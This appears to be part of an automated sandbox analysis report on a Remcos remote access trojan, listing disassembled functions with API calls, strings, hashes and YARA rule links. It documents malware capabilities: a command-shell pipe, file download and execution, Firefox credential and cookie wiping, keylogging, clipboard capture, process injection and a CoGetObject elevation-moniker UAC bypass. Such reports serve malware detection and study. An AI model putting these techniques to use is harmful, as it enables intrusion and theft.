                                                                                                • Instruction Fuzzy Hash: BEF0B431500F65ABBF222E22AC05E5B3769DB81770B14412BB914EA286CA38FC0186AC
                                                                                                Function 004461B8 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AllocateHeap
                                                                                                • String ID:
                                                                                                • API String ID: 1279760036-0
                                                                                                • Opcode ID: 9dc7fa543976cc1aa64452a14dec52ea5ded8d4e1ebcbf177ce858167d1c4c1d
                                                                                                • Instruction ID: 139fbca062bb8bf671a891d82c3cf8fc988f9ce198a1a8b78c24da0334343556
                                                                                                • Opcode Fuzzy Hash: 9dc7fa543976cc1aa64452a14dec52ea5ded8d4e1ebcbf177ce858167d1c4c1d
                                                                                                • Instruction Fuzzy Hash: CEE0E531A0021267F6312A269C01B5B76599B437A0F170137AD15922D2CE6CCD0181EF
                                                                                                Function 0040489E Relevance: 1.5, APIs: 1, Instructions: 15networkCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Startup
                                                                                                • String ID:
                                                                                                • API String ID: 724789610-0
                                                                                                • Opcode ID: 8e7c991b928bea2de9b1e1f5f99946c2d0cf66c9d18890e3be99548e9599c2f5
                                                                                                • Instruction ID: 8755cd578eecc9cf916cb98f31ec890f8d4d8ec8e876fe09ba6f20fbb4fb2f80
                                                                                                • Opcode Fuzzy Hash: 8e7c991b928bea2de9b1e1f5f99946c2d0cf66c9d18890e3be99548e9599c2f5
                                                                                                • Instruction Fuzzy Hash: 02D0123255C60CCED620ABB4AD0F8A4775CC717616F0403BA6CB5C26D7E6405A2DC2AB

                                                                                                Non-executed Functions

                                                                                                Function 0040569A Relevance: 47.5, APIs: 15, Strings: 12, Instructions: 278pipesleepfileCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • __Init_thread_footer.LIBCMT ref: 004056E6
                                                                                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                                • __Init_thread_footer.LIBCMT ref: 00405723
                                                                                                • CreatePipe.KERNEL32(00476CDC,00476CC4,00476BE8,00000000,004660CC,00000000), ref: 004057B6
                                                                                                • CreatePipe.KERNEL32(00476CC8,00476CE4,00476BE8,00000000), ref: 004057CC
                                                                                                • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00476BF8,00476CCC), ref: 0040583F
                                                                                                • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405897
                                                                                                • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004058BC
                                                                                                • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058E9
                                                                                                  • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                                                                • WriteFile.KERNEL32(00000000,00000000,?,00000000,00474FA0,004660D0,00000062,004660B4), ref: 004059E4
                                                                                                • Sleep.KERNEL32(00000064,00000062,004660B4), ref: 004059FE
                                                                                                • TerminateProcess.KERNEL32(00000000), ref: 00405A17
                                                                                                • CloseHandle.KERNEL32 ref: 00405A23
                                                                                                • CloseHandle.KERNEL32 ref: 00405A2B
                                                                                                • CloseHandle.KERNEL32 ref: 00405A3D
                                                                                                • CloseHandle.KERNEL32 ref: 00405A45
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                                                                                • String ID: @lG$@lG$@lG$@lG$@lG$SystemDrive$cmd.exe$kG$lG$lG$lG$lG
                                                                                                • API String ID: 2994406822-3565532687
                                                                                                • Opcode ID: 7f44424ad113f420e48d11417b11709670515d2f43eb42571c8ee31cf0889dad
                                                                                                • Instruction ID: efba9956b6c01968ba48be3e84054341744464a70a9fb060b5e58b4ef4e39929
                                                                                                • Opcode Fuzzy Hash: 7f44424ad113f420e48d11417b11709670515d2f43eb42571c8ee31cf0889dad
                                                                                                • Instruction Fuzzy Hash: ED91B271600604AFD711FB35AD41A6B3AAAEB84344F01443FF549A72E2DB7D9C488F6D
                                                                                                Function 00407CD2 Relevance: 42.8, APIs: 10, Strings: 14, Instructions: 835filesleepCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • SetEvent.KERNEL32(?,?), ref: 00407CF4
                                                                                                • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00407DC2
                                                                                                • DeleteFileW.KERNEL32(00000000), ref: 00407DE4
                                                                                                  • Part of subcall function 0041C322: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752E8,00475300,00000001), ref: 0041C37D
                                                                                                  • Part of subcall function 0041C322: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004752E8,00475300,00000001), ref: 0041C3AD
                                                                                                  • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752E8,00475300,00000001), ref: 0041C402
                                                                                                  • Part of subcall function 0041C322: FindClose.KERNEL32(00000000,?,?,?,?,?,004752E8,00475300,00000001), ref: 0041C463
                                                                                                  • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004752E8,00475300,00000001), ref: 0041C46A
                                                                                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                                  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                  • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474F08,?), ref: 00404B47
                                                                                                  • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,?,00474F08,?,?,?,?,?,?,0040547D), ref: 00404B75
                                                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 004081D2
                                                                                                • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004082B3
                                                                                                • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 004084FF
                                                                                                • DeleteFileA.KERNEL32(?), ref: 0040868D
                                                                                                  • Part of subcall function 00408847: __EH_prolog.LIBCMT ref: 0040884C
                                                                                                  • Part of subcall function 00408847: FindFirstFileW.KERNEL32(00000000,?,00466618,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408905
                                                                                                  • Part of subcall function 00408847: __CxxThrowException@8.LIBVCRUNTIME ref: 0040892D
                                                                                                  • Part of subcall function 00408847: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040893A
                                                                                                • Sleep.KERNEL32(000007D0), ref: 00408733
                                                                                                • StrToIntA.SHLWAPI(00000000,00000000), ref: 00408775
                                                                                                  • Part of subcall function 0041CA73: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CB68
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
                                                                                                • String ID: 8PG$Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$hPG$hPG$hPG$hPG$open
                                                                                                • API String ID: 1067849700-718893278
                                                                                                • Opcode ID: f47694642a9727c552664b30ecd2bee36f1658a4f502a4b631e59be2092a5c87
                                                                                                • Instruction ID: d596b55e62c6dc406d7f5c06aadeacefb76b4acf2f669351df47ebe9cc805958
                                                                                                • Opcode Fuzzy Hash: f47694642a9727c552664b30ecd2bee36f1658a4f502a4b631e59be2092a5c87
                                                                                                • Instruction Fuzzy Hash: 9F4282716043016BC604FB76C9579AE77A9AF91348F80483FF582671E2EE7C9908C79B
                                                                                                Function 00412132 Relevance: 33.5, APIs: 7, Strings: 12, Instructions: 238threadCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetCurrentProcessId.KERNEL32 ref: 00412141
                                                                                                  • Part of subcall function 004138B2: RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                                                                                  • Part of subcall function 004138B2: RegSetValueExA.KERNELBASE(004660B4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138DB
                                                                                                  • Part of subcall function 004138B2: RegCloseKey.ADVAPI32(004660B4,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138E6
                                                                                                • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00412181
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00412190
                                                                                                • CreateThread.KERNEL32(00000000,00000000,00412829,00000000,00000000,00000000), ref: 004121E6
                                                                                                • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 00412455
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                                                                                                • String ID: (TG$Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe$RG
                                                                                                • API String ID: 3018269243-1913798818
                                                                                                • Opcode ID: bdb2bee7da37e1d86ea7d703bbd03755c4d0d8442807112e76db2deed89afc60
                                                                                                • Instruction ID: 26abbb7e12f392f9fbc718c06b30ae47eaa1113e002934215aad22704783e961
                                                                                                • Opcode Fuzzy Hash: bdb2bee7da37e1d86ea7d703bbd03755c4d0d8442807112e76db2deed89afc60
                                                                                                • Instruction Fuzzy Hash: 3C71A23160420167C604FB72CD579AE77A4AE94308F40097FF586A61E2FFBC9945C69E
                                                                                                Function 0040BB6B Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 146fileCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BBEA
                                                                                                • FindClose.KERNEL32(00000000), ref: 0040BC04
                                                                                                • FindNextFileA.KERNEL32(00000000,?), ref: 0040BD27
                                                                                                • FindClose.KERNEL32(00000000), ref: 0040BD4D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Find$CloseFile$FirstNext
                                                                                                • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                                                                • API String ID: 1164774033-3681987949
                                                                                                • Opcode ID: 1dd2d77424a1feb7b81cbbfb01062b06d0993b8648acb28e4275aca406a32408
                                                                                                • Instruction ID: 8b0b2ff803da1d4b435a108118727fe7c74031c8ac088da8990f7d135a86af9b
                                                                                                • Opcode Fuzzy Hash: 1dd2d77424a1feb7b81cbbfb01062b06d0993b8648acb28e4275aca406a32408
                                                                                                • Instruction Fuzzy Hash: C7514F3190021A9ADB14FBB2DC56AEEB739AF10304F50057FF506721E2FF785A49CA99
                                                                                                Function 004168FC Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 80clipboardmemoryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • OpenClipboard.USER32 ref: 004168FD
                                                                                                • EmptyClipboard.USER32 ref: 0041690B
                                                                                                • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 0041692B
                                                                                                • GlobalLock.KERNEL32(00000000), ref: 00416934
                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 0041696A
                                                                                                • SetClipboardData.USER32(0000000D,00000000), ref: 00416973
                                                                                                • CloseClipboard.USER32 ref: 00416990
                                                                                                • OpenClipboard.USER32 ref: 00416997
                                                                                                • GetClipboardData.USER32(0000000D), ref: 004169A7
                                                                                                • GlobalLock.KERNEL32(00000000), ref: 004169B0
                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 004169B9
                                                                                                • CloseClipboard.USER32 ref: 004169BF
                                                                                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                                                                                • String ID: !D@
                                                                                                • API String ID: 3520204547-604454484
                                                                                                • Opcode ID: a0ac8c9fcef4dc4e23bfd817548aa8a4d562d0e7a0b2016193ed8f12b8a4dca9
                                                                                                • Instruction ID: 40a69bedac3bd734cdfdd6227e623399476ab8ebe6f0a7c245c4ec6d1d06efb6
                                                                                                • Opcode Fuzzy Hash: a0ac8c9fcef4dc4e23bfd817548aa8a4d562d0e7a0b2016193ed8f12b8a4dca9
                                                                                                • Instruction Fuzzy Hash: 16215171204301EBD714BB71DC5DAAE7AA9AF88746F00043EF946961E2EF3C8C45866A
                                                                                                Function 0040BD72 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 131fileCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BDEA
                                                                                                • FindClose.KERNEL32(00000000), ref: 0040BE04
                                                                                                • FindNextFileA.KERNEL32(00000000,?), ref: 0040BEC4
                                                                                                • FindClose.KERNEL32(00000000), ref: 0040BEEA
                                                                                                • FindClose.KERNEL32(00000000), ref: 0040BF0B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Find$Close$File$FirstNext
                                                                                                • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                                                • API String ID: 3527384056-432212279
                                                                                                • Opcode ID: 0e02877a0a7a0854a613cb848fbdcbf87c912738fbad3b4f45ae5d99c19712fd
                                                                                                • Instruction ID: 490896facf616f27299b965c2ba25c256be2621490ca3b25f990f1d956524bcc
                                                                                                • Opcode Fuzzy Hash: 0e02877a0a7a0854a613cb848fbdcbf87c912738fbad3b4f45ae5d99c19712fd
                                                                                                • Instruction Fuzzy Hash: E0417F3190021AAACB04F7B2DC5A9EE7769AF11704F50057FF506B21E2EF385A458A9D
                                                                                                Function 0040F4AF Relevance: 19.5, APIs: 6, Strings: 5, Instructions: 210processCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,004750F4,?,00475348), ref: 0040F4C9
                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00475348), ref: 0040F4F4
                                                                                                • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040F510
                                                                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F58F
                                                                                                • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00475348), ref: 0040F59E
                                                                                                  • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                                                                                  • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                                                                                • CloseHandle.KERNEL32(00000000,?,00475348), ref: 0040F6A9
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
                                                                                                • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe$RG
                                                                                                • API String ID: 3756808967-4270599879
                                                                                                • Opcode ID: f5140d914c5819211218b59f29845687241db36a24a788e1bd0b27517d468fe6
                                                                                                • Instruction ID: f7ffc7f0dfbd756cb6275d6ec2ba0be94116b78c8c9f611e281f0170cc986b4a
                                                                                                • Opcode Fuzzy Hash: f5140d914c5819211218b59f29845687241db36a24a788e1bd0b27517d468fe6
                                                                                                • Instruction Fuzzy Hash: 4C7130705083419AC724FB21D8559AEB7E4AF90348F40483FF586631E3EF79994DCB9A
                                                                                                Function 00419662 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 206COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 0$1$2$3$4$5$6$7
                                                                                                • API String ID: 0-3177665633
                                                                                                • Opcode ID: 49f4933aa84a896eb8c39cf471aa4ec6f5a3d30c1b635cd71b5a616930add701
                                                                                                • Instruction ID: 3c74f5afe55031bef20d6cb4aa2bc38f0c43463ce83be6e36937eb537edf8bdf
                                                                                                • Opcode Fuzzy Hash: 49f4933aa84a896eb8c39cf471aa4ec6f5a3d30c1b635cd71b5a616930add701
                                                                                                • Instruction Fuzzy Hash: CB71E2709183019FD704EF21D862BAB7B94DF85710F00492FF5A26B2D1DE78AB49CB96
                                                                                                Function 0040A41B Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 112keyboardthreadCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetForegroundWindow.USER32(?,?,00475100), ref: 0040A451
                                                                                                • GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A45D
                                                                                                • GetKeyboardLayout.USER32(00000000), ref: 0040A464
                                                                                                • GetKeyState.USER32(00000010), ref: 0040A46E
                                                                                                • GetKeyboardState.USER32(?,?,00475100), ref: 0040A479
                                                                                                • ToUnicodeEx.USER32(00475154,?,?,?,00000010,00000000,00000000), ref: 0040A49C
                                                                                                • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4FC
                                                                                                • ToUnicodeEx.USER32(00475154,?,?,?,00000010,00000000,00000000), ref: 0040A535
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                                                                                • String ID: (kG
                                                                                                • API String ID: 1888522110-2813241365
                                                                                                • Opcode ID: 79348ff8eaa35f6faedaca36de41c7c480938a272048c625dc6fe4e82d71162d
                                                                                                • Instruction ID: 3b9a32d10988b9101c987d3e8fcb44953e801c6634267c48ca941b3c69dca571
                                                                                                • Opcode Fuzzy Hash: 79348ff8eaa35f6faedaca36de41c7c480938a272048c625dc6fe4e82d71162d
                                                                                                • Instruction Fuzzy Hash: F8316D72504308BFD700DFA0DC45F9B7BECAB88754F00083AB645D61A0D7B5E948CBA6
                                                                                                Function 00407538 Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 56COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • _wcslen.LIBCMT ref: 0040755C
                                                                                                • CoGetObject.OLE32(?,00000024,00466528,00000000), ref: 004075BD
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Object_wcslen
                                                                                                • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                                                                                • API String ID: 240030777-3166923314
                                                                                                • Opcode ID: 117ce5ffae064854f49a167cf2fa86c02e7857af1ac0d1358aae668e1cde24ce
                                                                                                • Instruction ID: 28daeeabb8f9d0779e909056d36d27ae9c6096be3406941992b1a3e854751cf1
                                                                                                • Opcode Fuzzy Hash: 117ce5ffae064854f49a167cf2fa86c02e7857af1ac0d1358aae668e1cde24ce
                                                                                                • Instruction Fuzzy Hash: 88113771D04214B6D710EA959845BDEB77C9B08714F15006FF904B2281EB7CAE448A6F
                                                                                                Function 0041A7D9 Relevance: 15.2, APIs: 10, Instructions: 228serviceCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004758F8), ref: 0041A7EF
                                                                                                • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0041A83E
                                                                                                • GetLastError.KERNEL32 ref: 0041A84C
                                                                                                • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041A884
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                                                                • String ID:
                                                                                                • API String ID: 3587775597-0
                                                                                                • Opcode ID: 8a09e391cf35051e339281d2a4b7d01a54059c7697b547b8b8149822d0e6778f
                                                                                                • Instruction ID: 52116c85fb856a5ac6c14b0259405ec20ae2fa8d9cc538ef9907a440d1633313
                                                                                                • Opcode Fuzzy Hash: 8a09e391cf35051e339281d2a4b7d01a54059c7697b547b8b8149822d0e6778f
                                                                                                • Instruction Fuzzy Hash: 17817071104301ABC304EF61D885DAFB7A8FF94749F50082EF185521A2EF78EE49CB9A
                                                                                                Function 0040C388 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 112fileCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040C3D6
                                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 0040C4A9
                                                                                                • FindClose.KERNEL32(00000000), ref: 0040C4B8
                                                                                                • FindClose.KERNEL32(00000000), ref: 0040C4E3
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Find$CloseFile$FirstNext
                                                                                                • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                                                • API String ID: 1164774033-405221262
                                                                                                • Opcode ID: e90d06a8ec93e69e400289d3d5a4f788ee45a56a67685538a4b9ff5dd8d84a81
                                                                                                • Instruction ID: 33618048715e6b2d4a7b39963b1e19558724686ef99070a322097c87c0ca4c0c
                                                                                                • Opcode Fuzzy Hash: e90d06a8ec93e69e400289d3d5a4f788ee45a56a67685538a4b9ff5dd8d84a81
                                                                                                • Instruction Fuzzy Hash: 59313E31500219AACB14E761DC9A9EE7778AF50719F10057FF106B21E2EF7C9946CA4D
                                                                                                Function 0041C322 Relevance: 13.6, APIs: 9, Instructions: 106fileCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752E8,00475300,00000001), ref: 0041C37D
                                                                                                • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004752E8,00475300,00000001), ref: 0041C3AD
                                                                                                • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752E8,00475300,00000001), ref: 0041C41F
                                                                                                • DeleteFileW.KERNEL32(?,?,?,?,?,?,004752E8,00475300,00000001), ref: 0041C42C
                                                                                                  • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752E8,00475300,00000001), ref: 0041C402
                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,004752E8,00475300,00000001), ref: 0041C44D
                                                                                                • FindClose.KERNEL32(00000000,?,?,?,?,?,004752E8,00475300,00000001), ref: 0041C463
                                                                                                • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004752E8,00475300,00000001), ref: 0041C46A
                                                                                                • FindClose.KERNEL32(00000000,?,?,?,?,?,004752E8,00475300,00000001), ref: 0041C473
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                                                                • String ID:
                                                                                                • API String ID: 2341273852-0
                                                                                                • Opcode ID: 74fc921fbbcb6c35e60b9a8f4f047a03f237c0767a03969ab094381de9c75e57
                                                                                                • Instruction ID: 53b23dfad01ba0d5beec27b7c27070a1caf437d6ccbc5233b8522822963bc02e
                                                                                                • Opcode Fuzzy Hash: 74fc921fbbcb6c35e60b9a8f4f047a03f237c0767a03969ab094381de9c75e57
                                                                                                • Instruction Fuzzy Hash: 4A31807284431CAADB24E761DC89EEB736CAF09305F0405FBF559D2051EB3DDAC98A58
                                                                                                Function 00414005 Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 382registrylibraryloaderCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004140D8
                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004140E4
                                                                                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                                • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 004142A5
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 004142AC
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
